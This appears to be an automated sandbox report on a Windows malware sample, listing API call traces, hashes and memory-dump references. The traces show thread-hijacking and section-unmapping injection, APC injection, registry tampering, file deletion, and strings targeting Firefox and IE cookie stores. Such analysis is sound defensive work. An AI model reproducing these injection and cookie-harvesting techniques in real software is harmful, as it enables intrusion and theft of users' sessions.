    • Part of subcall function 01B33DE6: RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E13
    • Part of subcall function 01B33DE6: SetLastError.KERNEL32(00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B33E1A
  • ResumeThread.KERNELBASE(?), ref: 01B32418
    • Part of subcall function 01B31A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,01B32370,00000000,01B324C1,CCCCFEEB,00000000,01B324C1), ref: 01B31A4D
    • Part of subcall function 01B31A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,01B324C1,00000004,?,?,?,?,01B32370,00000000,01B324C1), ref: 01B31A81
  • ResumeThread.KERNELBASE(?,00000000,01B324C1,CCCCFEEB,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B32380
  • WaitForSingleObject.KERNEL32(00000064), ref: 01B3238E
  • SuspendThread.KERNELBASE(?), ref: 01B323A1
    • Part of subcall function 01B33DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33DDD
    • Part of subcall function 01B32175: memset.NTDLL ref: 01B321A3
    • Part of subcall function 01B32175: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 01B3222D
    • Part of subcall function 01B32175: WaitForSingleObject.KERNEL32(00000064), ref: 01B3223B
    • Part of subcall function 01B32175: SuspendThread.KERNEL32(?), ref: 01B3224E
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,01B323F9,?,01B323F9,01B323F9,?,?,?,?,00000000), ref: 01B31DE0
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,01B323F9,?,01B323F9,01B323F9,?,?,?,?,00000000), ref: 01B31E2F
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,01B324F9,00000800,?,?,?,00000000), ref: 01B31E9F
    • Part of subcall function 01B31CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 01B31ECA
    • Part of subcall function 01B31CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B31ED1
    • Part of subcall function 01B31CB2: CloseHandle.KERNEL32(00000000), ref: 01B31EE0
    • Part of subcall function 01B31CB2: memset.NTDLL ref: 01B31EF4
  • GetLastError.KERNEL32(00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B3240D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001D8325, Relevance: 7.5, APIs: 5, Instructions: 44 Total matches: 223libraryloader
Similarity
  • Total matches: 223
  • API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess
  • String ID:
  • API String ID: 2525968537-0
  • Opcode ID: 334b4ad23c3ebcab69ace51bbaeeff1e78eacdd0a0d3c55371ac3bd1638c0514
  • Instruction ID: 2fed91824860867219421b56d998874166137be7872b13253ad3f3dc9ed3227f
  • Opcode Fuzzy Hash: 4CD05EF84B9C968B402B7450581D36CA586B9D12C5ACC3663F326A685EAB11B3D0477A
  • Instruction Fuzzy Hash: 2fed91824860867219421b56d998874166137be7872b13253ad3f3dc9ed3227f
APIs
  • GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
  • GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
  • OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
  • IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
  • CloseHandle.KERNEL32(00000000), ref: 001D8391
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B3421D, Relevance: 6.1, APIs: 4, Instructions: 99 Total matches: 294registrysynchronization
Similarity
  • Total matches: 294
  • API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject
  • String ID:
  • API String ID: 748258982-0
  • Opcode ID: 7bf492882853c3015655118e3a7311c329205b35a24c50d6a171498e9cb856b8
  • Instruction ID: c4f6a71227964e3593b2b7d6490afeb5c5d07facd6dc22aca2af185f2e6999e2
  • Opcode Fuzzy Hash: 88F0C94503ACC397C42F94822FA2B63E242EF219C8C8CE795BBB47E1F91D6036124627
  • Instruction Fuzzy Hash: c4f6a71227964e3593b2b7d6490afeb5c5d07facd6dc22aca2af185f2e6999e2
APIs
  • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,?,00000000,000000B7,?,?,00000000,?,?,01B37494), ref: 01B34244
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • RegEnumKeyExA.KERNEL32(?,?,?,01B37494,00000000,00000000,00000000,00000000,00000104,00000000,?,?,00000000,?,?,01B37494), ref: 01B3428B
  • WaitForSingleObject.KERNEL32(00000000,?), ref: 01B342F8
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
    • Part of subcall function 01B32E04: StrChrA.SHLWAPI(01B37494,0000005F), ref: 01B32E47
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,01B37494), ref: 01B32E5F
    • Part of subcall function 01B32E04: RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 01B32E95
    • Part of subcall function 01B32E04: RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32EBB
    • Part of subcall function 01B32E04: lstrlenW.KERNEL32 ref: 01B32ECC
    • Part of subcall function 01B32E04: RtlAllocateHeap.NTDLL(00000000,01B374CA), ref: 01B32EE1
    • Part of subcall function 01B32E04: RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32F06
    • Part of subcall function 01B32E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F2A
    • Part of subcall function 01B32E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F3C
    • Part of subcall function 01B32E04: lstrcmpiW.KERNEL32(00000000), ref: 01B32F53
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,01B380FA), ref: 01B32F95
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,?), ref: 01B32FEE
    • Part of subcall function 01B32E04: RegCreateKeyA.ADVAPI32(?,?,?), ref: 01B33002
    • Part of subcall function 01B32E04: RegQueryValueExA.ADVAPI32(?,01B38256,00000000,?,?,01B37494), ref: 01B33025
    • Part of subcall function 01B32E04: RegOpenKeyExA.ADVAPI32(?,?,00000000,01B342EB,?,?,01B34303,0AEBFFFF), ref: 01B33088
    • Part of subcall function 01B32E04: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 01B330A3
    • Part of subcall function 01B32E04: RegDeleteValueW.ADVAPI32(?,01B37560), ref: 01B330B1
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(?), ref: 01B330BA
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(?), ref: 01B330C3
    • Part of subcall function 01B32E04: HeapFree.KERNEL32(00000000,01B37494,?), ref: 01B330D8
    • Part of subcall function 01B32E04: HeapFree.KERNEL32(00000000,00000000), ref: 01B330FB
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(00000000), ref: 01B3310D
  • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,00000000,?,?,01B37494), ref: 01B34320
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B33368, Relevance: 6.1, APIs: 4, Instructions: 71 Total matches: 385file
Similarity
  • Total matches: 385
  • API ID: CloseHandleCreateFileReadFileSetFilePointer
  • String ID:
  • API String ID: 3466452087-0
  • Opcode ID: f05951512fc70493bcc218ada1478013eab1d332df878026975bea813deea018
  • Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
  • Opcode Fuzzy Hash: 32E026401A9D83C9C64754854852F22B264E764646DACF7626718BF232AF263236DF2A
  • Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
APIs
    • Part of subcall function 01B33C8B: GetModuleFileNameW.KERNEL32(01B37494,00000000,00000104,00000208,01B3618C,0000000C,?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000), ref: 01B33CB1
    • Part of subcall function 01B33C8B: GetModuleFileNameA.KERNEL32(01B37494,00000000,00000104,00000208,01B3618C,0000000C,?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000), ref: 01B33CB9
    • Part of subcall function 01B33C8B: GetLastError.KERNEL32(?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000,?,?,?,01B317BE), ref: 01B33CF7
    • Part of subcall function 01B348FB: lstrcmp.KERNEL32(?,01B37494), ref: 01B349A8
    • Part of subcall function 01B348FB: lstrlen.KERNEL32(?,00000000,00000000,01B31852), ref: 01B349B3
  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 01B333BB
  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,01B31BAF,01B38451), ref: 01B333CD
  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 01B333E5
  • CloseHandle.KERNEL32(?), ref: 01B33400
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001C3C55, Relevance: 6.1, APIs: 4, Instructions: 67 Total matches: 64memoryregistry
Similarity
  • Total matches: 64
  • API ID: HeapFreeRegCloseKeyRegQueryValueExRtlAllocateHeap
  • String ID:
  • API String ID: 1519508758-0
  • Opcode ID: 2c20f16d7cb35b0837f37e1f163c74e89bf46e78e287d7b3e7984998dc48fbe4
  • Instruction ID: 12fb51b55a7001464f3794808c81bf3cfeac7e12aa544af5f58c252b32687a95
  • Opcode Fuzzy Hash: BFE07DE10F45C256111F7D4A647FA76C310CC440D130C7313BD74596BD0E43301B8709
  • Instruction Fuzzy Hash: 12fb51b55a7001464f3794808c81bf3cfeac7e12aa544af5f58c252b32687a95
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
  • HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
  • RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3BF0, Relevance: 4.5, APIs: 3, Instructions: 39 Total matches: 129registrystring
Similarity
  • Total matches: 129
  • API ID: RegCreateKeyRegOpenKeylstrlen
  • String ID:
  • API String ID: 3913359509-0
  • Opcode ID: 4a10325c95453f6cc476ef8e5a47647315785bf9e091164d0adb2aeafd4fec03
  • Instruction ID: 51caf505ad6b25b9284138eb4f6b6eda7fb90fd966c398a8e598c706edcf3f74
  • Opcode Fuzzy Hash: 9CD0A934820C8ACBC02B88001C6AA2A80A0AB010C2C8C627278C23912B2F9072892EA5
  • Instruction Fuzzy Hash: 51caf505ad6b25b9284138eb4f6b6eda7fb90fd966c398a8e598c706edcf3f74
APIs
  • RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
  • RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
  • lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
    • Part of subcall function 001CBE3C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,001EB004,?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000), ref: 001CBE7C
    • Part of subcall function 001CBE3C: CloseHandle.KERNEL32(000000FF), ref: 001CBE87
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false

Similar Non-Executed Functions

Function 001C1C50, Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 158 Total matches: 59memorystringfile
Similarity
  • Total matches: 59
  • API ID: HeapFree$RtlAllocateHeaplstrcat$CreateDirectoryDeleteFilelstrlenmbstowcs
  • String ID: %APPDATA%$%APPDATA%\Mozilla\Firefox\Profiles$\cookie.ff$\cookie.ie$\sols
  • API String ID: 2820067504-4232923486
  • Opcode ID: 3d14cf29faf766bfeb75039b264b2d7cbadb4797a584a71d88c970bf056bfa6f
  • Instruction ID: 901aeb1831ed6878ca2adce8fbd2872f2b742ef2d46d3f993e52c754e3bb2ff3
  • Opcode Fuzzy Hash: A2118CB00A05034BC02BA862E5AA37F4981BE835C4C4D1763FE05AB12E1F5731E67F0B
  • Instruction Fuzzy Hash: 901aeb1831ed6878ca2adce8fbd2872f2b742ef2d46d3f993e52c754e3bb2ff3
APIs
  • lstrlen.KERNEL32(%APPDATA%), ref: 001C1C68
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
  • RtlAllocateHeap.NTDLL(00000000,?,%APPDATA%\Mozilla\Firefox\Profiles), ref: 001C1CB3
  • mbstowcs.NTDLL ref: 001C1CC6
  • lstrcatW.KERNEL32(00000000,001EC804), ref: 001C1CD5
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C1CF9
  • RtlAllocateHeap.NTDLL(00000000,0000020C), ref: 001C1D0B
  • lstrcatW.KERNEL32(00000000,001E53C0), ref: 001C1D2D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C1D51
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 001C1D77
    • Part of subcall function 001C1B85: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1BC4
    • Part of subcall function 001C1B85: lstrcpyW.KERNEL32(00000000,001C1DC2), ref: 001C1BD5
    • Part of subcall function 001C1B85: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1BEC
    • Part of subcall function 001C1B85: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1C05
    • Part of subcall function 001C1B85: CopyFileW.KERNEL32(?,00000000,00000000), ref: 001C1C34
    • Part of subcall function 001C1B85: HeapFree.KERNEL32(00000000,00000000), ref: 001C1C42
  • DeleteFileW.KERNEL32(?), ref: 001C1DC6
  • HeapFree.KERNEL32(00000000,?), ref: 001C1DD4
  • HeapFree.KERNEL32(00000000,?), ref: 001C1DF0
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D6F2E, Relevance: 19.7, APIs: 13, Instructions: 233 Total matches: 56filesynchronization
Similarity
  • Total matches: 56
  • API ID: FindFirstFile$FindCloseFindNextFileWaitForSingleObjectmemset
  • String ID:
  • API String ID: 1787114350-0
  • Opcode ID: f51bd5130761bfcbb2dde5f7148bce543a8c4d605f388eb2cd72b1422ad7a0c5
  • Instruction ID: bd781be9b02a429d5c41947a9cf951fafe2009a97a88700872d728148f38a155
  • Opcode Fuzzy Hash: 9831CD22216EB4C3D517A5A94459779F901DF007D6F09FB11E9A2E04CD9DC35AB0FF18
  • Instruction Fuzzy Hash: bd781be9b02a429d5c41947a9cf951fafe2009a97a88700872d728148f38a155
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memset.NTDLL ref: 001D6FCE
  • FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
  • FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
  • FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
  • WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
  • FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DF422, Relevance: 10.6, APIs: 7, Instructions: 85 Total matches: 37registrylibraryloader
Similarity
  • Total matches: 37
  • API ID: GetLastError$FreeLibraryGetProcAddressLoadLibraryRegCloseKeyRegOpenKey
  • String ID:
  • API String ID: 3176510729-0
  • Opcode ID: c06c93110e7f7b91b8af1b73fb1b0b90ed9f89153cfcabb1f297ed8ce1865d6a
  • Instruction ID: fcf1d727c95837e4298bacd4dfe6948e9c21b2cb80fe885b4227e83466d2943b
  • Opcode Fuzzy Hash: CCF097B98604C18EC212342048796E6BB04AF400C5A9C1762FE94042826F1531673B96
  • Instruction Fuzzy Hash: fcf1d727c95837e4298bacd4dfe6948e9c21b2cb80fe885b4227e83466d2943b
APIs
  • RegOpenKeyA.ADVAPI32(80000002,001E74AC,00000001), ref: 001DF43D
  • RegCloseKey.ADVAPI32(?), ref: 001DF4EE
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • LoadLibraryA.KERNEL32(00000000), ref: 001DF48B
  • GetProcAddress.KERNEL32(00000000,001ED2EE), ref: 001DF49D
  • GetLastError.KERNEL32 ref: 001DF4BC
  • FreeLibrary.KERNEL32(00000000), ref: 001DF4CE
  • GetLastError.KERNEL32 ref: 001DF4D6
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB35F, Relevance: 10.6, APIs: 7, Instructions: 65 Total matches: 59threadprocesslibrary
Similarity
  • Total matches: 59
  • API ID: CreateToolhelp32SnapshotGetModuleHandleGetProcAddressOpenThreadQueueUserAPCThread32FirstThread32Next
  • String ID:
  • API String ID: 1672352458-0
  • Opcode ID: 1aeb80c38cfc5c0a8cfd58ac1562df29def6d9c7c8df75773877e7a5eae794f0
  • Instruction ID: 2c1285140dd081ac5577a07b8dcb83313de7ecbc8bee00da9e77533937aa6cbe
  • Opcode Fuzzy Hash: D4E02064520567CFC21760B0915371EF90479A5CD5E1C777FF4A428E0B2E0731A7A375
  • Instruction Fuzzy Hash: 2c1285140dd081ac5577a07b8dcb83313de7ecbc8bee00da9e77533937aa6cbe
APIs
  • CreateToolhelp32Snapshot.KERNEL32 ref: 001CB391
  • GetModuleHandleA.KERNEL32(001EC01D,001ED067,00000004,00000000,00000000,00000000,00000001), ref: 001CB3A8
  • GetProcAddress.KERNEL32(00000000), ref: 001CB3AF
  • Thread32First.KERNEL32(001CD6FE,0000001C), ref: 001CB3BF
  • OpenThread.KERNEL32(001F03FF,00000000,00000000,001CD6FE,0000001C), ref: 001CB3DA
  • QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 001CB3EB
  • Thread32Next.KERNEL32(001CD6FE,0000001C), ref: 001CB3FB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D72AD, Relevance: 7.6, APIs: 5, Instructions: 107 Total matches: 56file
Similarity
  • Total matches: 56
  • API ID: DeleteFileFindFirstFileFindNextFileGetLastErrorRemoveDirectory
  • String ID:
  • API String ID: 1089496181-0
  • Opcode ID: 404a45bcf307c79ebd751717ed0c922086e74df7a977f6731b91689120b89dc8
  • Instruction ID: 90ed9556279df49a0f93b6e45a9746ece17ae1501ae5ed02bf884558c7615ea3
  • Opcode Fuzzy Hash: 2401CBA3511DC96BEF83A1E06920BCBD444EF01270E8EE379A934204C54F00798B3B8F
  • Instruction Fuzzy Hash: 90ed9556279df49a0f93b6e45a9746ece17ae1501ae5ed02bf884558c7615ea3
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • FindFirstFileW.KERNEL32(?,00000000), ref: 001D7327
  • RemoveDirectoryW.KERNEL32(?), ref: 001D73A1
  • DeleteFileW.KERNEL32(?), ref: 001D73AC
  • FindNextFileW.KERNEL32(?,00000000), ref: 001D73BF
  • GetLastError.KERNEL32 ref: 001D73DA
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CBEAE, Relevance: 7.5, APIs: 5, Instructions: 44 Total matches: 120pipethread
Similarity
  • Total matches: 120
  • API ID: GetLastError$CloseHandleCreateNamedPipeCreateThread
  • String ID:
  • API String ID: 1313248766-0
  • Opcode ID: 30add2293a1c4e7698607cd224a2cd89a7530f0af40c3b4cc732cba0ae1be137
  • Instruction ID: 4148eaee69a31b6fb3cd0b83f2f9e5c8e854a768ff6cb781906392e167196464
  • Opcode Fuzzy Hash: C6D0A7B057080ACAC517A130847936FABD5EFC51C1E8D0776F780B106F6B9731EA989E
  • Instruction Fuzzy Hash: 4148eaee69a31b6fb3cd0b83f2f9e5c8e854a768ff6cb781906392e167196464
APIs
  • CreateNamedPipeA.KERNEL32(40000003,00000004,000000FF,00000100,00000100,00000000,001EB0D8,079007F4), ref: 001CBED5
  • CreateThread.KERNEL32(00000000,00000000,001CBB92,00000000,00000000,?), ref: 001CBEEF
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF00
  • CloseHandle.KERNEL32(00000000), ref: 001CBF09
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF11
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CDCA5, Relevance: 4.5, APIs: 3, Instructions: 27 Total matches: 86memorynative
Similarity
  • Total matches: 86
  • API ID: HeapFreeNtUnmapViewOfSectionRtlNtStatusToDosError
  • String ID:
  • API String ID: 3330954857-0
  • Opcode ID: 02a61448e217c9ef6f534c07a9fd427649efd77a8a877fb27eb9f5184da74e11
  • Instruction ID: 0644c66e21c54e57ba80f44bb6735bfe181557861a3a7a617ae7e4636646a487
  • Opcode Fuzzy Hash: 1CC02BB0481582C3B53F0CA2008E126ED45BAD32E0A0E1025E0083404CF5A3C7FCBF49
  • Instruction Fuzzy Hash: 0644c66e21c54e57ba80f44bb6735bfe181557861a3a7a617ae7e4636646a487
APIs
  • NtUnmapViewOfSection.NTDLL(079007F4), ref: 001CDCCE
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001CDCD5
  • HeapFree.KERNEL32(00000000,00000000,079007F4), ref: 001CDCE4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3684, Relevance: 27.3, APIs: 18, Instructions: 264 Total matches: 106memorystring
Similarity
  • Total matches: 106
  • API ID: HeapFree$RtlAllocateHeap$lstrlenwsprintf
  • String ID:
  • API String ID: 2041449020-0
  • Opcode ID: 540e5d8870bfb511a3d1955c9ad0a08f1ccba355172afbf88c2f817bd2b431a8
  • Instruction ID: bba761aa04d3bbfd698f0c8175b6501ca71d3289cc1fe08320dbb8ae1c2a3fdb
  • Opcode Fuzzy Hash: E33169710A8C82D6C42BA8D284B47BE9144B7C18D9C8D2B37FE583D0AD1F8321C66B92
  • Instruction Fuzzy Hash: bba761aa04d3bbfd698f0c8175b6501ca71d3289cc1fe08320dbb8ae1c2a3fdb
APIs
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C36C4
  • RtlAllocateHeap.NTDLL(00000000,00010000,001EC206), ref: 001C36E2
  • HeapFree.KERNEL32(00000000,?), ref: 001C3988
    • Part of subcall function 001CBE3C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,001EB004,?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000), ref: 001CBE7C
    • Part of subcall function 001CBE3C: CloseHandle.KERNEL32(000000FF), ref: 001CBE87
  • HeapFree.KERNEL32(00000000,00000000,0000011A), ref: 001C3713
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800,001E53C8), ref: 001DDB9C
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32(?,00000000,00000001,001E53C8,00000002,?,?), ref: 001DDBB2
    • Part of subcall function 001DDB79: QueryPerformanceFrequency.KERNEL32(?), ref: 001DDC07
    • Part of subcall function 001DDB79: QueryPerformanceCounter.KERNEL32(?), ref: 001DDC11
    • Part of subcall function 001DDB79: _aulldiv.NTDLL(?,?,?,?), ref: 001DDC23
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDCEB
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32 ref: 001DDCFC
    • Part of subcall function 001DDB79: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DDD10
    • Part of subcall function 001DDB79: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DDD2E
    • Part of subcall function 001DDB79: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DDD60
    • Part of subcall function 001DDB79: lstrcpy.KERNEL32(?,001ED78A), ref: 001DDD85
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,?), ref: 001DDE1F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DDE2E
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,00000000), ref: 001DDE3F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,001ED78A), ref: 001DDE50
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000), ref: 001DDE5F
  • HeapFree.KERNEL32(00000000,001E53C8,0000011B), ref: 001C3788
    • Part of subcall function 001DDB3A: memcpy.NTDLL(001CD4DC,001CD4DC,00000000,001CD4DC,001CD4DC,001CD4DC,00000000,?,?,001C4CB1,00000000,00000001,00000000,001EC1F9,001CD4DC,00000000), ref: 001DDB5D
    • Part of subcall function 001D9692: memset.NTDLL ref: 001D96C0
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(?,001E53C4), ref: 001D9721
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9740
    • Part of subcall function 001D9692: _strupr.NTDLL ref: 001D9747
